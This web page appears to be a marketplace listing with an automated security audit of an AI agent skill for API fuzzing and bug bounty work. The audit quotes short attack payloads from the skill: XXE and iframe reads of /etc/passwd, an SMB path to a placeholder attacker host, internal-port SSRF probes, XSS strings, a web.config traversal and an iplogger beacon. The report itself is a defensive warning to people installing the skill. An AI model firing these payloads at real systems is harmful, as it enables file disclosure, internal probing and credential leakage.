Skip to main content

api-fuzzing-bug-bounty

Provides techniques for testing API security, identifying vulnerabilities, and conducting penetration testing for REST, SOAP, and GraphQL APIs.

Install this skill

or
53/100

Security score

The api-fuzzing-bug-bounty skill was audited on May 12, 2026 and we found 15 security issues across 3 threat categories, including 2 high-severity. Review the findings below before installing.

Categories Tested

Security Issues

medium line 421

Curl to non-GitHub URL

SourceSKILL.md
421curl -X POST https://target.com/graphql \
high line 142

Access to /etc/passwd

SourceSKILL.md
142<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
high line 299

Access to /etc/passwd

SourceSKILL.md
299<iframe src="file:///etc/passwd" height=1000 width=800>
low line 61

External URL reference

SourceSKILL.md
61kr scan https://target.com -w routes-large.kite
low line 148

External URL reference

SourceSKILL.md
148<object data="http://127.0.0.1:8443"/>
low line 149

External URL reference

SourceSKILL.md
149<img src="http://127.0.0.1:445"/>
low line 157

External URL reference

SourceSKILL.md
157https://example.org/download?filename=a.png
low line 158

External URL reference

SourceSKILL.md
158https://example.org/download?filename=C:\inetpub\wwwroot\web.config
low line 159

External URL reference

SourceSKILL.md
159https://example.org/download?filename=\\smb.dns.attacker.com\a.png
low line 253

External URL reference

SourceSKILL.md
253http://target.com/graphql?query={user(name:"<script>alert(1)</script>"){id}}
low line 256

External URL reference

SourceSKILL.md
256http://target.com/example?id=%C/script%E%Cscript%Ealert('XSS')%C/script%E
low line 302

External URL reference

SourceSKILL.md
302<object data="http://127.0.0.1:8443"/>
low line 305

External URL reference

SourceSKILL.md
305<img src="http://127.0.0.1:445"/>
low line 308

External URL reference

SourceSKILL.md
308<img src="https://iplogger.com/yourcode.gif"/>
low line 421

External URL reference

SourceSKILL.md
421curl -X POST https://target.com/graphql \
Scanned on May 12, 2026
View Security Dashboard
Installation guide →
GitHub Stars 21.5K
Rate this skill
Categorydevelopment
UpdatedMay 13, 2026
frontenddocxgitapidatabasetestingmobilebackendml-ai-engineersecurity-engineerbackend-developerqa-engineerproduct-managerdevelopmentproduct
sickn33/antigravity-awesome-skills